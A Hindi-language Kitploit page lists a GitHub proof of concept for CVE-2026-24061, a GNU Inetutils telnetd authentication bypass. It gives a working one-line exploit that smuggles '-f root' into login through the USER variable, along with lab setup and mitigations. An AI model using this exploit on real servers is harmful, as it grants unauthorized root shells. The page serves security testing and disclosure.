Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/midox008/cve-2026-24061
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubmidox008/cve-2026-24061

CVE-2026-24061

GNU Inetutils telnetd रिमोट प्रमाणीकरण बायपास

रिपॉजिटरी देखें
544 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061

GNU Inetutils telnetd रिमोट प्रमाणीकरण बायपास

गंभीरता से, 2026 में telnet? चलो दोस्तों, अब आगे बढ़ने का समय आ गया है। SSH 1995 से मौजूद है। 🤦

विवरण

GNU Inetutils telnetd में एक गंभीर प्रमाणीकरण बायपास भेद्यता जो संस्करण 1.9.3 से 2.7 को प्रभावित करती है।

यह भेद्यता login(1) में दुर्भावनापूर्ण तर्क इंजेक्ट करने के लिए NEW-ENVIRON telnet विकल्प का शोषण करती है। telnet प्रोटोकॉल के माध्यम से USER=-f root सेट करके, एक हमलावर प्रमाणीकरण को बायपास कर सकता है और बिना क्रेडेंशियल के रूट शेल प्राप्त कर सकता है।

प्रभावित संस्करण

  • GNU Inetutils 1.9.3 - 2.7

तकनीकी विवरण

telnet प्रोटोकॉल NEW-ENVIRON विकल्प (RFC 1572) का समर्थन करता है जो क्लाइंट को सर्वर पर पर्यावरण चर भेजने की अनुमति देता है। telnetd डेमॉन USER चर को login(1) में एक तर्क के रूप में पास करता है।

USER=-f root भेजने पर, मान की व्याख्या इस प्रकार की जाती है:

  • -f फ्लैग: प्रमाणीकरण छोड़ें (विश्वसनीय होस्ट)
  • root: लक्षित उपयोगकर्ता

इससे login -f root निष्पादित होता है, जो तत्काल रूट एक्सेस प्रदान करता है।

PoC IAC WILL ECHO (0xff 0xfb 0x01) की जाँच करके सफल शोषण का पता लगाता है - यह प्रोटोकॉल सिग्नल है जो सर्वर शेल एक्सेस दिए जाने पर भेजता है।

लैब सेटअप

root@kitploit:~
# भेद्य telnetd कंटेनर बनाएं और चलाएं
docker compose up --build -d

# शोषण का परीक्षण करें
go run poc.go 127.0.0.1 2323

शोषण

root@kitploit:~
# Go PoC का उपयोग करके (इंटरैक्टिव शेल के साथ)
go run poc.go <target> <port>

# मानक telnet क्लाइंट का उपयोग करके सरल PoC
env USER='-f root' telnet -a <target> <port>

शमन

  • 2026 में telnet का उपयोग बंद करें, सच में 🙏
  • इसके बजाय SSH का उपयोग करें (यह अब 31 वर्षों से मौजूद है, मैं '95 में पैदा भी नहीं हुआ था lol)
  • GNU Inetutils के पैच किए गए संस्करण में अपग्रेड करें
  • फ़ायरवॉल नियमों के माध्यम से telnet एक्सेस प्रतिबंधित करें

फ़ाइलें

  • poc.go - इंटरैक्टिव शेल के साथ Go शोषण
  • Dockerfile - भेद्य telnetd कंटेनर
  • docker-compose.yml - लैब ऑर्केस्ट्रेशन

संदर्भ

  • सलाह: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

श्रेय

  • LeakIX अनुसंधान टीम
टूल डाउनलोड करें